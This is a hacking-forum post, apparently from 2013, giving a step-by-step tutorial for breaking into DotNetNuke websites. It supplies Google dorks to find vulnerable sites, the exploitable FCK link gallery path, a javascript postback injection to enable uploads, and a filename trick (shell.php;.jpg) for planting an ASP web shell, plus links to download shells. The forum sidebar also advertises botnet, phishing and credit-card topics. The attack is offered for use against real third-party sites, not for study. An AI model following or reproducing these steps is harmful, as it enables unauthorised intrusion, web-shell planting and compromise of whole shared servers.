Ethical Experts
Ethical Experts

A Community Dedicated to Helping and Learning . Here You Will Get Hacking Tutorials and Monetizing Methods . We Hope You Have a Pleasant Stay
 
HomeHome  SearchSearch  FAQFAQ  RegisterRegister  Log in  
Still Currently working on the forum design, until I find a perfect design that can sit there for the whole life :p .. Please Bare with us if you see the design change while / after you refresh a page or return ! Sorry for the Inconvenience ~!
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Hack Pack : Largest Hacking Tools Collection
Tue Apr 28, 2015 9:35 am by THE-OUTSIDER

» Hi everyone!
Fri Nov 07, 2014 11:24 pm by zekrum

» Hacking Email ID's
Thu Sep 25, 2014 7:22 pm by NAVEEN KUMAR . S

» entering in a computer binary
Sat Sep 20, 2014 1:29 pm by erosh23

» hi hackers
Sat Sep 20, 2014 1:26 pm by erosh23

» Introduce Yourself !
Sat Sep 20, 2014 1:23 pm by erosh23

» Hello guys
Wed Jul 30, 2014 10:52 pm by RZero67

» need botnet like zues Betabot or any good botnet files please admin help me
Fri Jul 25, 2014 9:44 pm by sire_roktiv

» Extension Spoofer v0.1 [Beta Release]
Fri Jul 11, 2014 9:33 am by The Joker

Most Viewed Topics
Hack Pack : Largest Hacking Tools Collection
HACK WIFI PASSWORD USING CMD WHEN YOU ARE CONNECTED WITH WIFI
Hack Your BroadBand !! RISK FREE !!
How to Hack the Windows Admin Password Using OphCrack in Backtrack tutorial
Hacking With Keyloggers Prorat
How to Get Unlimited time in an Internet Cafe ... :D
How to Hack Websites & Servers - Tutorial
Cracking a WPA/WPA-2 Password.. ;)
Backtrack and Facebook
Credit Card Generating Sequence
Keywords
download pack gmail hacker phishing credit page free tools facebook account backtrack email card crack admin ddos internet wifi prorat password file Windows hacking hack netcat
Facebook Like

Share | 
 

 DNN (Dot Net Nuke Exploitation)

View previous topic View next topic Go down 
AuthorMessage
The Joker
Admin
Admin
avatar

Posts : 182
Join date : 2012-06-11
Age : 26

PostSubject: DNN (Dot Net Nuke Exploitation)   Thu Jan 10, 2013 4:42 pm

Hello everyone!! Previously we have discussed about "How to Hack Website Using Havij". Today,I am going to tell about one more very usefull but old method which you can used to hack website using Dot net nuke(DNN) exploit. I know some of you know about this method DNN but it is very good exploit to hack dot net sites. By using this DNN exploit, you can even hack all sites which are hosted on same server. Also you can upload any file using it. It is easy method as compared to other hacking attacks such as SQL-Injection and Cross Site Scripting etc.

For the JavaScript applets to Work I would recommend you guys to use Firefox 3.0

Download Firefox V. 3.0

What is DNN (Dot Net Nuke) ?

DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

Step 1: First go to google.com search page and use this following dork to find vulnerable site.

Code:

inurl:home/tabid/36/language/en-US/Default.aspx
inurl:fcklinkgallery.aspx
inurl:/portals/0 

Step 2: Open any of the Sites from the search and it should look like the one below:

Code:
http://www.someinsecuresite.com/home/tabid/36/language/en-US/Default.aspx

Now replace:
Code:
home/tabid/36/language/en-US/Default.aspx
with
Code:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

So your URL becomes:

http://www.someinsecuresite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Now Most probably assuming you get an Image like the one below, your site is vulnerable



Now select File: A file On your site as shown below:



Step 3: Now after selecting the option, we need to use a javascript code. Before using javascript, first we need to choose file location as root, after that clear everything written on browser url and paste the below javascript only.

Code:
javascript:__doPostBack('ctlURL$cmdUpload','')

After above javascript Injection is complete, you can see something like the image below:



Step 4: Now all you need to so is upload your shell.

Note: But remember you cant upload your shell directly in .php format and not even you can do anything by uploading .php.jpg

So for this purpose first we need to upload a special type of shell which is specially coded in asp.

You Can Download the collection of shells that i use.
Download Shells

Now here's part where you rename your shell to shell.php;.jpg

After upload complete you can view your shell by visiting the link:

http://www.someinsecuresite.com/portals/0/yourshell.asp;.jpg

Now that you have the shell uploaded, you can do whatever you like .. Wink

___________________________________________________
Do NOT PM me until you are DONATING or Your Upgrade  hasn't been completed even after you have purchased it .
If is one of the above, you can either choose to PM or mail me ..
Back to top Go down
View user profile http://teamiha.tumblr.com
 
DNN (Dot Net Nuke Exploitation)
View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Ethical Experts :: Hacking Section :: Hacking Tutorials-
Jump to: